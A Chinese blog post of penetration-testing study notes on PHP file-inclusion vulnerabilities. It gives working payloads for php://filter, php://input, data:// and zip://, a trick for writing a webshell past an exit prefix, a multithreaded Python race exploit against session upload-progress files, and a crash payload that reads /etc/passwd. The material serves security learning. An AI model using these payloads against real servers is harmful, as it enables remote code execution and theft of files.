渗透测试前四天PHP文件包含笔记

渗透测试前四天PHP文件包含笔记

一、基础概念

1.1 漏洞原理

PHP文件包含漏洞发生在使用文件包含函数时,用户可控的参数未经过严格过滤,导致可以包含任意文件。常见包含函数:

  • include()
  • require()

关键区别

  • include()失败时产生警告,脚本继续执行
  • require()失败时产生致命错误,脚本终止

1.2 环境要求

复制代码
allow_url_fopen = On      (允许打开远程文件,默认开启)
allow_url_include = On    (允许包含远程文件,PHP 5.2后默认关闭)

二、PHP伪协议利用

2.1 php://filter - 读取文件源码

作用 :读取文件并进行编码转换,避免直接执行
适用条件 :不受allow_url_fopenallow_url_include限制

基本用法

复制代码
php://filter/read=convert.base64-encode/resource=文件路径

读取当前目录文件

复制代码
?file=php://filter/read=convert.base64-encode/resource=flag.php

读取上级目录文件(使用多层符号链接):

复制代码
?file=php://filter/read=convert.base64-encode/resource=proc/self/root/proc/self/root/var/www/html/flag.php

2.2 php://input - 执行PHP代码

作用 :读取POST原始数据作为PHP代码执行
条件 :需要allow_url_include = On

示例

复制代码
POST /lfi.php?file=php://input
[POST DATA] <?php system('whoami'); ?>

2.3 data:// - 数据流协议

条件 :双on(allow_url_fopenallow_url_include都需开启)

用法

复制代码
?file=data://text/plain,<?php phpinfo(); ?>
?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

2.4 zip:// - 压缩包包含

特点

  • 不受allow_url_*限制
  • 需要绝对路径
  • zip:// 需要定格才可以使用

利用步骤

  1. 创建包含恶意代码的文件:shell.txt
  2. 压缩为ZIP:zip shell.zip shell.txt
  3. 上传并重命名为图片:mv shell.zip shell.jpg
  4. 包含利用:?file=zip:///var/www/html/uploads/shell.jpg%23shell.txt

2.5 compress.zlib:// - 临时文件利用

特殊用途 :在LFI中创建临时文件
原理 :使用compress.zlib://http://会在本地创建临时文件存储下载内容

三、绕过技巧

3.1 Base64解码绕过

场景 :写入文件时被添加<?php exit; ?>前缀

原理 :PHP Base64解码会跳过非法字符(<, ?, ;, >, 空格等)

利用方法

php 复制代码
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);

// 利用方式:filename=php://filter/write=convert.base64-decode/resource=shell.php
// POST txt=aaPD89YCRfR0VUWzBdYDs/Pg== ("phpexita" + shell_base64)

关键:让"phpexita"成为8字节合法Base64字符串被解码,后续内容也被解码

3.2 strip_tags绕过

原理strip_tags可去除XML标签

利用链

复制代码
php://filter/read=string.strip_tags|convert.base64-decode/resource=uploaded_file

四、临时文件竞争利用

4.1 phpinfo()辅助LFI

条件:存在phpinfo页面

原理

  1. PHP上传文件会先保存到临时文件(/tmp/phpXXXXXX)
  2. phpinfo会泄露临时文件名
  3. 在文件删除前竞争包含

Python利用脚本

python 复制代码
import threading, requests

target = 'http://192.168.1.100/'
sessid = 'test'

def upload(e):
    while not e.is_set():
        files = {'file': ('a.txt', b'a'*4096)}
        data = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("id"); ?>'}
        requests.post(target, files=files, data=data, cookies={'PHPSESSID': sessid})

def include(e):
    while not e.is_set():
        resp = requests.get(f'{target}?file=/tmp/sess_{sessid}')
        if 'uid=' in resp.text:
            print("Success!")
            e.set()

# 多线程提高成功率
event = threading.Event()
t1 = threading.Thread(target=upload, args=(event,))
t2 = threading.Thread(target=include, args=(event,))
t1.start(); t2.start()

4.2 Session.upload_progress(无需phpinfo)

PHP配置

复制代码
session.upload_progress.enabled = On   (默认开启)
session.upload_progress.cleanup = On   (默认开启,会清理Session)

利用条件:开启Session机制

数据包构造

http 复制代码
POST /upload.php HTTP/1.1
Cookie: PHPSESSID=attack_sess

------WebKitFormBoundary
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

<?php system('id'); ?>
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

[大文件内容]

包含路径/tmp/sess_attack_sess/var/lib/php/sessions/sess_attack_sess

4.3 PHP 7 残留文件

原理:利用PHP 7.0-7.1.19的崩溃漏洞使临时文件不被删除

崩溃Payload

复制代码
?file=php://filter/string.strip_tags/resource=/etc/passwd

利用流程

  1. 发送崩溃请求
  2. 同时上传文件(临时文件残留)
  3. 爆破临时文件名(/tmp/php[6随机字符])
相关推荐
冬奇Lab2 小时前
MediaPlayer 播放器架构:NuPlayer 的 Source/Decoder/Renderer 三驾马车
android·音视频开发·源码阅读
炸炸鱼.3 小时前
Python 操作 MySQL 数据库
android·数据库·python·adb
炽烈小老头3 小时前
【 每天学习一点算法 2026/04/12】x 的平方根
学习·算法
阿杰学AI4 小时前
AI核心知识115—大语言模型之 自监督学习(简洁且通俗易懂版)
人工智能·学习·ai·语言模型·aigc·监督学习·自监督学习
九英里路4 小时前
OS学习之路——动静态库制作与原理
linux·学习·操作系统·unix·进程·编译·动静态库
用户41659673693555 小时前
nextlib 项目架构与深度技术指南 (Architecture & Technical Master Guide)
android
red_redemption5 小时前
自由学习记录(160)
学习
南無忘码至尊5 小时前
Unity学习90天-第2天-认识Unity生命周期函数并用 Update 控制物体移动,FixedUpdate 控制物理
学习·unity·游戏引擎
aq55356005 小时前
Laravel10.x重磅升级,新特性一览
android·java·开发语言
Trouvaille ~5 小时前
【MySQL篇】数据类型:存储数据的基础
android·数据库·mysql·adb·字符集·数据类型·基础入门